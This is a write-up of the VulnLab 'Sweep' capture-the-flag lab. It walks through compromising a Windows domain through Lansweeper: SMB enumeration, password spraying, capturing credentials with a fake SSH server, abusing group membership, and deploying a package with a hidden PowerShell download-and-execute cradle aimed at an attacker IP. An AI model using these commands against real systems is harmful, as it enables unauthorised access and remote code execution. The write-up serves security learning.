Post

VulnLab Sweep

VulnLab Sweep

VulnLab Sweep

Sweep

Recon

1
2
└─$ rustscan -g -a 10.10.93.210 -r 1-65535
10.10.93.210 -> [53,81,82,88,135,139,389,445,464,593,636,3389,3269,3268,5357,5985,9389,49664,49670,49676,49675,49682,49715]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
└─$ nmap -sC -sV -p53,81,82,88,135,139,389,445,464,593,636,3389,3269,3268,5357,5985,9389,49664,49670,49676,49675,49682,49715 10.10.93.210
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 17:48 +05
Nmap scan report for 10.10.93.210
Host is up (0.089s latency).

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
81/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp    open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after:  2121-12-21T09:22:27
|_ssl-date: TLS randomness does not represent time
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-12-22 12:47:07Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
|_ssl-date: 2024-12-22T12:48:46+00:00; -1m18s from scanner time.
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2024-12-21T12:43:21
|_Not valid after:  2025-06-22T12:43:21
| rdp-ntlm-info: 
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   DNS_Tree_Name: sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-22T12:48:04+00:00
5357/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf            .NET Message Framing
49664/tcp open  msrpc             Microsoft Windows RPC
49670/tcp open  msrpc             Microsoft Windows RPC
49675/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc             Microsoft Windows RPC
49682/tcp open  msrpc             Microsoft Windows RPC
49715/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1m17s, deviation: 0s, median: -1m18s
| smb2-time: 
|   date: 2024-12-22T12:48:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.21 seconds

User

Nothing with anonymous bind in LDAP, but we have some results in SMB

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ nxc smb 10.10.93.210  -u 'guest' -p '' --shares                                                                    
SMB         10.10.93.210    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.93.210    445    INVENTORY        [+] sweep.vl\guest: 
SMB         10.10.93.210    445    INVENTORY        [*] Enumerated shares
SMB         10.10.93.210    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.93.210    445    INVENTORY        -----           -----------     ------
SMB         10.10.93.210    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.93.210    445    INVENTORY        C$                              Default share
SMB         10.10.93.210    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.93.210    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.93.210    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.93.210    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.93.210    445    INVENTORY        SYSVOL                          Logon server share

We found scripts in DefaultPackageShare, but nothing interesting inside. Let’s continue with rid-brute

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
└─$ nxc smb 10.10.93.210  -u 'guest' -p '' --rid-brute
SMB         10.10.93.210    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.93.210    445    INVENTORY        [+] sweep.vl\guest: 
SMB         10.10.93.210    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.93.210    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.93.210    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.93.210    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.93.210    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.93.210    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.93.210    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.93.210    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

Let’s try guessing password by using username as password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ nxc smb 10.10.93.210  -u users.list -p users.list --continue-on-success --no-bruteforce
SMB         10.10.93.210    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\jgre808:jgre808 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\bcla614:bcla614 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\hmar648:hmar648 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\jgar931:jgar931 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\fcla801:fcla801 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\jwil197:jwil197 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\grob171:grob171 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\fdav736:fdav736 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\jsmi791:jsmi791 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\hjoh690:hjoh690 STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\svc_inventory_win:svc_inventory_win STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [-] sweep.vl\svc_inventory_lnx:svc_inventory_lnx STATUS_LOGON_FAILURE 
SMB         10.10.93.210    445    INVENTORY        [+] sweep.vl\intern:intern 
SMB         10.10.93.210    445    INVENTORY        [+] sweep.vl\: 

We have a hit, let’s enumerate domain with bloodhound

1
2
3
└─$ bloodhound-python -d 'sweep.vl' -u 'intern' -p 'intern' -c all -ns 10.10.93.210 --zip
INFO: Found AD domain: sweep.vl
<SNIP>

We can also now read other shares as intern, but nothing interesting there. But we saw Lansweeper running on ports 81,82. We successfully login using intern creds

Looking around we find in Scanning -> Scanning credentials, svc_intentory_lnx credentials are saved without mapping. The user is a member of Remote Management Users group

We can try create a mapping to our attack box to capture the credentials. In order to do that, we can use fakessh. Then we create a new range where we specify our IP and map svc_intentory_lnx credentials

Now we deploy the scan

We receive connection with credentials

1
2
3
4
5
└─$ sudo docker run -it --rm -p 22:22 fffaraz/fakessh
2024/12/22 13:27:39.101050 10.10.93.210:60194
2024/12/22 13:27:46.388558 10.10.93.210:60206
2024/12/22 13:27:46.911487 10.10.93.210:60207
2024/12/22 13:27:47.296428 10.10.93.210:60207 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx <REDACTED>

We can add user to group

1
└─$ net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx%'<REDACTED>' -S 10.10.93.210
1
2
3
└─$ net rpc group members "Lansweeper Admins" -U SWEEP/svc_inventory_lnx%'<REDACTED>' -S 10.10.93.210                 
SWEEP\jgre808
SWEEP\svc_inventory_lnx

We can now evil-winrm to host

1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u 'svc_inventory_lnx' -p '<REDACTED>' -i 10.10.93.210
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_lnx\Documents>

Root

Since we added user to Lansweeper Admins group, svc_inventory_lnx has more privileges in Lansweeper dashboard

We can now deploy packages. Create a new package and add step

We set the following payload in the command window

1
powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.4.147/shell.txt');

Now, we need to map the credentials to our target

After mapping we can deploy the package by clicking Deploy now and selecting our target

We receive our shell

https://api.vulnlab.com/api/v1/share?id=99895046-cd49-4b72-9a6c-c7827d3a7221

This post is licensed under CC BY 4.0 by the author.